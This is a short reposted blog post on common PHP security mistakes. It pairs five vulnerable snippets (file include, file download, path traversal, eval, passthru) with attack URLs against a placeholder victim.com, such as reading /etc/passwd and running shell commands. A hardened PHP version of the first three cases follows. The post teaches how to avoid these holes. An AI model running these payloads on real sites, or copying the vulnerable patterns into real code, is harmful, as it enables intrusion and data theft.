Fatal errors in writing PHP scripts

Tuesday, September 23, 2008, Posted by Akbar a.k.a. p4rcomX, No Comment

Some mistakes in writing PHP scripts that can have fatal consequences.

======
case 1
======
[scripts]
$page = $_GET[page];
include($page);

[attack]
http://victim.com/file.php?page=[Injection URL]


======
case 2
======
[scripts]
header( "Content-Type: application/octet-stream" );
header( "Content-Length: " . filesize($_GET['file'] ) );
header( "Content-Disposition: inline; filename=\"$_GET[file]\"");
readfile($_GET['file'] );

[attack]
http://victim.com/file.php?file=index.php


======
case 3
======
[scripts]
$fp = fopen("/path/{$_GET['filename']}.txt", 'r');

[attack]
http://victim.com/file.php?filename=../../../etc/passwd


======
case 4
======
[scripts]
eval($_GET[ev]);

[attack]
http://victim.com/file.php?ev=include($_GET[irv]);&irv=[injection URL]


======
case 5
======
[scripts]
passthru($_GET[cmd]);

[attack]
http://victim.com/file.php?cmd=ls -al
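
As an added example, not part of the original post or of Irvian's blog, here is a hardened counterpart to cases 1 through 3 (the pages/ and downloads/ directories and the page names are assumptions). Cases 4 and 5 have no safe counterpart: user input must never reach eval() or passthru() at all.

```php
<?php
// Added example (not from the original post): hardened counterparts to
// cases 1-3. Assumed layout: pages/ and downloads/ next to this script.

// Case 1: map a request key to a fixed file instead of including user input.
function safe_include(string $requested): void
{
    $allowed = [
        'home'    => __DIR__ . '/pages/home.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
    if (!array_key_exists($requested, $allowed)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $allowed[$requested];
}

// Cases 2 and 3: return the canonical path only if it stays inside $baseDir.
function resolve_inside(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // basename() strips any directory part (../ traversal) and the extension
    // is fixed here, so ?filename=../../../etc/passwd cannot escape.
    $candidate = realpath($base . '/' . basename($name) . '.txt');
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Prefix check includes the separator so /srv/downloads-x is rejected.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

function safe_download(string $name): void
{
    $path = resolve_inside(__DIR__ . '/downloads', $name);
    if ($path === null) {
        http_response_code(404);
        exit('File not found');
    }
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . filesize($path));
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
}

if (isset($_GET['file'])) {
    safe_download($_GET['file']);
} else {
    safe_include($_GET['page'] ?? 'home');
}
```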

(Repost From Irvian Blog)
